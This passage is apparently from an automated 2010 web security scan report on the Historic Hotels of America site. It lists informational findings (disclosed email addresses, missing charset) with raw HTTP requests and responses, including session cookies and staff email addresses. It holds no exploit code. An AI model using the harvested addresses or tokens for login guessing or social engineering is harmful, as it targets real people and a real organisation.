The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://www.historichotels.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; __utmc=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:39:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a
                                   href="mailto:webmaster@historichotels.org">webmaster@historichotels.org</a>
...[SNIP]...

6.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /fckeditor/editor/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; __utmc=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a
                                   href="mailto:webmaster@historichotels.org">webmaster@historichotels.org</a>
...[SNIP]...

6.3. http://www.historichotels.org/hotel_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /hotel_image.php

Issue detail

The following email address was disclosed in the response:

Request

GET /hotel_image.php HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 20:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of America Error ID# 1287694157">hha@preferredhotelgroup.com</a>
...[SNIP]...

6.4. http://www.historichotels.org/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /shop

Issue detail

The following email address was disclosed in the response:

Request

GET /shop HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Shop HHA, Historic Hotels of America</title>
<META http-equiv=Co
...[SNIP]...
<a href="mailto:dcelio@preferredhotelgroup.com">dcelio@preferredhotelgroup.com</a>
...[SNIP]...

7. HTML does not specify charset  previous
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


7.1. http://www.historichotels.org/hotel_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /hotel_image.php

Request

GET /hotel_image.php HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 20:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

7.2. http://www.historichotels.org/inc_hotel_list.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /inc_hotel_list.php

Request

GET /inc_hotel_list.php?hotel_state_code=CA& HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.historichotels.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:39:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html


<script language="javascript">
   function GetHotels() {
       //alert(xmlhttp.responseText);
       //divDsp('hotel_list_a', 'none');
       var x = new getObj('hotel_list_div');
       x.innerHTML = xmlhttp.respo
...[SNIP]...

Report generated by Hoyt LLC Research at Thu Oct 21 16:54:32 CDT 2010.